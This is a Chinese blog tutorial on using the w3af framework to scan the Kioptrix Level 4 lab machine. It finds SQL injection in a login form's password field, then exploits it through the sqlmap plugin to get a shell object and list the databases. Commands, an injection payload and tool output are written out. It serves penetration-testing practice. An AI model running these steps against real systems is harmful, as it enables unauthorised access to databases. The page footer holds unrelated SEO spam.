qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          W3af簡單使用教程

           w3af是一個Web應用程序攻擊和檢查框架.該項目已超過130個插件,其中包括檢查網站爬蟲,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),遠程文件包含(RFI)等.該項目的目標是要建立一個框架,以尋找和開發Web應用安全漏洞,所以很容易使用和擴展.
            0×00 概述
            在BackTrack5R3下使用w3af測試Kioptrix Level 4的SQL注入漏洞.
            0×01 簡介
            w3af是一個Web應用程序攻擊和檢查框架.該項目已超過130個插件,其中包括檢查網站爬蟲,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),遠程文件包含(RFI)等.該項目的目標是要建立一個框架,以尋找和開發Web應用安全漏洞,所以很容易使用和擴展.
            0×02 安裝
            root@bt:~# apt-get install w3af
            0×03 啟動
            root@bt:~# cd /pentest/web/w3af/root@bt:/pentest/web/w3af# ./w3af_console
            0×04 漏洞掃描配置
            w3af>>> plugins//進入插件模塊w3af/plugins>>> list discovery //列出所有用于發現的插件w3af/plugins>>> discovery findBackdoor phpinfo webSpider //啟用findBackdoor phpinfo webSpider這三個插件w3af/plugins>>> list audit //列出所有用于漏洞的插件w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss //啟用blindSqli fileUpload osCommanding sqli xss這五個插件w3af/plugins>>> back//返回主模塊w3af>>> target//進入配置目標的模塊w3af/config:target>>>set target http://192.168.244.132///把目標設置為http://192.168.244.132/w3af/config:target>>> back//返回主模塊
            0×05 漏洞掃描
          w3af>>> start
          ---New URL found by phpinfo plugin: http://192.168.244.132/New URL found by phpinfo plugin: http://192.168.244.132/checklogin.phpNew URL found by phpinfo plugin: http://192.168.244.132/index.phpNew URL found by webSpider plugin: http://192.168.244.132/New URL found by webSpider plugin: http://192.168.244.132/checklogin.phpNew URL found by webSpider plugin: http://192.168.244.132/index.phpFound 3 URLs and 8 different points of injection.The list of URLs is:- http://192.168.244.132/index.php- http://192.168.244.132/checklogin.php- http://192.168.244.132/The list of fuzzable requests is:- http://192.168.244.132/ | Method: GET- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")- http://192.168.244.132/checklogin.php | Method: GET- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")- http://192.168.244.132/index.php | Method: GET- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.Scan finished in 19 seconds.---//開始掃描
            0×06 漏洞利用配置
            w3af>>> exploit //進入漏洞利用模塊w3af/exploit>>> list exploit//列出所有用于漏洞利用的插件w3af/exploit>>> exploit sqlmap //使用sqlmap進行SQL注入漏洞的測試
          ---Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...Vulnerability successfully exploited. This is a list of available shells and proxies:- [0] <sqlobject ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>Please use the interact command to interact with the shell objects.---//測試存在SQL注入漏洞//這里要記住shell objects(這里是0),等一下要用到0x07 漏洞利用w3af/exploit>>> interact 0//interact + shell object就可以利用了---Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shellw3af/exploit/sqlmap-0>>> ---//sqlmap的一個交互式模塊w3af/exploit/sqlmap-0>>> dbs   ---Available databases:  [3]:[*] information_schema[*] members[*] mysql---//成功獲得數據庫信息
           

          posted on 2014-10-11 11:09 順其自然EVO 閱讀(939) 評論(0)  編輯  收藏 所屬分類: 測試學習專欄安全性測試

          <2014年10月>
          2829301234
          567891011
          12131415161718
          19202122232425
          2627282930311
          2345678

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 昌吉市| 栾城县| 名山县| 呼伦贝尔市| 涟源市| 万荣县| 嘉定区| 宣化县| 瓦房店市| 宕昌县| 革吉县| 河南省| 大庆市| 遂溪县| 广宁县| 廉江市| 武夷山市| 博白县| 梁平县| 石景山区| 荣昌县| 礼泉县| 三江| 七台河市| 永春县| 新泰市| 靖江市| 且末县| 即墨市| 德化县| 独山县| 元氏县| 太原市| 肃南| 清远市| 玛多县| 新安县| 民和| 贺兰县| 榆社县| 乳山市|